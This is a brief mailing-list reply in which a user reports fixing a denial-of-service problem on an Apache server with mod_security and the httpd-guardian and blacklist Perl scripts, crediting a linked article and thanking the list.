Re: how to protect an apache from a DOS Attack

Hi All,

I finally have resolved the problem with mod_security and two perl scripts
from Apache-tools (httpd-guardian and blacklist)

I have followed the indications of this web:

http://erethesunrises.net/bbom/articles/apache_mod_security/mod_security

I think the problem is solved. Now I´m waiting for the attackers (with the
machine gun :-))

thanks for your answers,

ESG
<http://erethesunrises.net/bbom/articles/apache_mod_security/mod_security>